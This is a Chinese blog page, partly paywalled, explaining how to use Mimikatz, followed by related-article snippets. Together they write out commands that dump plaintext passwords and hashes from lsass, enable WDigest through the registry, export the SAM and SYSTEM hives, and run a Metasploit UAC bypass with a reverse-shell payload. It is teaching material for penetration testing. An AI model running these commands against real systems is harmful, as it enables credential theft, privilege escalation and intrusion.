Mimikatz使用

最新推荐文章于 2025-05-12 06:41:16 发布
最新推荐文章于 2025-05-12 06:41:16 发布
阅读量986 收藏 4
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46804551/article/details/115427728
Mimikatz是一款用于安全测试的工具,能够从lsass.exe进程中提取明文密码和哈希。本文介绍了如何修改注册表以获取Win10和2012R2以上系统的明文密码,使用Procdump+Mimikatz组合在无法直接运行Mimikatz的环境中获取密码,以及通过dcsync和ntdsutil.exe在域环境中进行哈希传递攻击和黄金票据攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

简介

Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!

使用:

- 获取本地账号密码

#提升权限
privilege::debug

#抓取密码
sekurlsa::logonpasswords

在这里插入图片描述
当目标为win10或者2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
cmd修改注册表命令

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWO
最低0.47元/天 解锁文章
3.8-Mimikatz在线读取sam和lsass获取密码
qq_38122566的博客
03-12 346
使用mimikatz在线读取sam文件分开的命令如下连起来。
技术分享 | mimikatz的常见使用方法
Uguardsec的博客
08-10 3478
0x00简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就
mimikatz使用
热门推荐
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-15 3万+
mimikatz的下载地址 , 提取码是 kcuh mimikatz是个好东西,它的功能很多,最重要的是能获取windows的账号及明文密码 使用方法: 1:远程连接使用 控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 这里抓到了administrator的账号,密码是null,说明没设密码 注意: 1、 文件夹里有两个版本,一个是对应32位系统的,一个是64位系
CS内网渗透 - 自带的工具 Mimikatz 的主要功能与作用
最新发布
浩策盾悟
05-12 9325
Mimikatz是一款针对Windows平台的后渗透工具,主要用于凭证转储、令牌操作和提权,帮助攻击者在获得初步访问权限后,通过提取内存中的明文密码、哈希和Kerberos票据,进行横向移动和权限提升。在内网环境中,Mimikatz常用于横向攻击、持久化配置和安全态势侦查。尽管WAF和防火墙对其本地操作影响有限,但杀毒软件和EDR系统通过签名检测和行为监控对Mimikatz的防御效果显著。攻击者常通过代码混淆和内存注入等技术绕过检测。因此,防御方需加强监控和内存保护措施,以有效应对Mimikatz的威胁。
mimikatz的基本使用
a3320315的博客
05-25 1万+
常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--
mimikatz常见命令
G3et的博客
01-29 1887
Mimikatz 是一款用于提取 Windows 系统中用户凭据(例如用户名和密码哈希)的开源工具。它可以在不破坏凭据的情况下轻松访问和使用这些凭据。可以被用于攻击域控制器、服务器和客户端机器,从而获得更多权限并执行恶意操作。
内网渗透神器(Mimikatz)——使用教程,你会的还只有初级工程师的技术吗
2401_84446919的博客
04-18 1970
在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等。从sam.hive和system.hive文件中获得NTLM Hash。sr98: 用于SR98设备和T5577目标的RF模块。rdm: RDM(830AL)器件的射频模块。rpc: mimikatz的RPC控制。导出lsass.exe进程中所有的票据。(在域控上执行)读取所有域用户的哈希。acr: ACR模块。开启Wdigest Auth。关闭Wdigest Auth。
[后渗透]Mimikatz使用大全1
08-03
【后渗透技术】Mimikatz使用详解 Mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于系统权限提升、密码获取和安全审计。它以其强大的功能在网络安全领域广受欢迎,特别是在渗透测试和红队操作...
mimikatz使用方法
课嗨教育的专栏
04-23 3994
0x00 简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe进程中获取当前登录系统用户名的密码, lsass 是微软 Windows 系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass 内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对 lsass 逆算获取.
mimikatz使用
mirror97black的博客
04-11 7201
mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权 privilege::debug //提升权限(从administrator提升到system) 抓取hash sekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行) lsadump::lsa ...
mimikatz使用以及源码动态分析
weixin_46956745的博客
05-08 3426
mimikatz使用以及源码分析 文章目录mimikatz使用以及源码分析前言一、mimikatz安装运行二、mimikatz源码分析1.函数具体功能2.函数源码分析(动态)总结 前言 Mimikatz 是法国人 Gentil Kiwi 编写的一款 windows 平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取 windows 处于 active 状态账号的明文密码。mimikatz 的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz
Mimikatz安装 lsass进程 SAM NTML
banliyaoguai的博客
05-14 1425
Mimikatz是一款开源的Windows安全工具,由法国安全研究员Benjamin Delpy开发。它最初被设计为用于学习C语言和进行Windows安全性实验的工具。然而,由于其强大的功能,它也可以用来从Windows系统中提取敏感信息,如明文密码、哈希值、PIN码和Kerberos票据等。总的来所它可以获取windows系统内存的密码,提供其他域的攻击方式。
mimikazi教程
tomyyyyy
08-24 2406
目录mimikazi教程1、简介1.1、背景介绍1.2、官方链接1.3、mimikatz 与凭证2、基本使用2.1、常用命令2.2、远程连接使用2.3、本地使用2.4、读取域控成员Hash2.4.1、域控本地读取2.4.2、导出域成员Hash2.4.3、secretsdump脚本直接导出域hash2.5、哈希传递2.5.1、工作组环境2.5.2 域环境2.6 票据传递攻击(PTT)2.6.1 黄...
mimikatz免杀之通过SAM和System文件抓取密码
m0_47083622的博客
04-19 9765
最近学习使用Mimikatz工具抓取Windows密码时发现Procdump、SQLDumper、DumpMinitool等一系列能导出lsass进程的工具已经被360“拉黑”了。不过还可以通过SAM和System文件抓取密码和Hash,目前测试360和火绒都不会拦截 以下为操作: 利用注册表命令将目标机的sam或者system文件导出 reg save hklm\sam sam.hive reg save hklm\system system.hive 然后将目标机上的sam.hive和syst
萌新如何玩转mimikatz
m0_71745484的博客
02-13 7664
mimikatz就是我遇见的一个坎
Mimikatz学习笔记
SWEET0SWAT的博客
02-25 3228
使用SAM和System文件抓取密码 导出sam和system文件抓取密码 reg save hklm\sam sam.hive reg save hklm\system system.hive
wdm 驱动 win7 无法加载_详解Windows渗透测试工具Mimikatz的内核驱动
weixin_39888080的博客
12-10 1595
一、概述Mimikatz通过其中包含的Mimidrv驱动程序,提供了利用内核模式的功能。Mimidrv是已经签名的Windows驱动模型(WDM)内核模式软件驱动程序,在相关命令前加上感叹号(!)即可与标准Mimikatz可执行文件共同使用。Mimidrv没有相应文档,并且很少被人使用,但它却提供了一个非常值得关注的方式,让我们可以在ring 0执行一些操作。本文详细分析Mimidrv...
【后渗透】Mimikatz使用大全
hacker3062的博客
10-14 2051
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
内网安全之:Windows 密码抓取
f_carey的博客
11-14 4247
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 密码抓取 1 mimikatz 抓取密码 注:在 Windows 系统中抓取 NTLM Hash 值或明文密码,必须将权限提升到 System;lsass.exe 进程用于实现 Windows 的安全策略。 利用通过 SAM 和 System 文件获得 NTLM Hash gentilkiw.
kali mimikatz使用教程
02-28
### Kali Linux 上 Mimikatz使用教程 #### 安装与准备 Kali Linux 是基于 Debian 的操作系统,因此可以利用 `apt` 软件包管理器来安装所需的工具。对于 Mimikatz,在较新的版本中,其功能已经被集成到了 Kiwi 模块之中[^4]。 为了确保能够顺利运行 Mimikatz 或者说 Kiwi 模块的功能,操作环境应当具有足够的权限——即 system 权限。这意味着如果通过 Metasploit Framework (MSF) 进行攻击,则需先将现有的 shell 提升至 system 级别。 #### 获取并加载 Mimikatz/Kiwi 在终端输入如下命令以启动带有 mimikatz 功能的 kiwi 模块: ```bash use exploit/windows/local/bypassuac set payload windows/x64/meterpreter/reverse_tcp exploit -j -z sessions -l sessions -i <session_id> load kiwi ``` 上述脚本假设读者正在使用 MSF 并已成功建立了一个 session。最后一行用于载入 kiwi 模块以便后续调用 mimikatz 命令。 #### 密码提取 一旦获得了适当级别的访问控制权之后,就可以尝试从内存或其他位置检索凭证信息了。例如,要转储 SAM 数据库中的散列值,可执行以下指令: ```bash privilege::debug sekurlsa::logonpasswords ``` 第一条命令赋予进程调试特权,这对于许多 mimikatz 操作来说都是必需的前提条件之一。第二条则会显示登录用户的明文密码以及哈希值(如果有),这些数据按照认证 ID、包名、域/机器名称、用户名和密码的形式被呈现出来[^5]。 请注意,这里所描述的过程仅适用于合法授权的安全测试活动当中,并且应该遵循所有适用法律及道德准则来进行实践。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值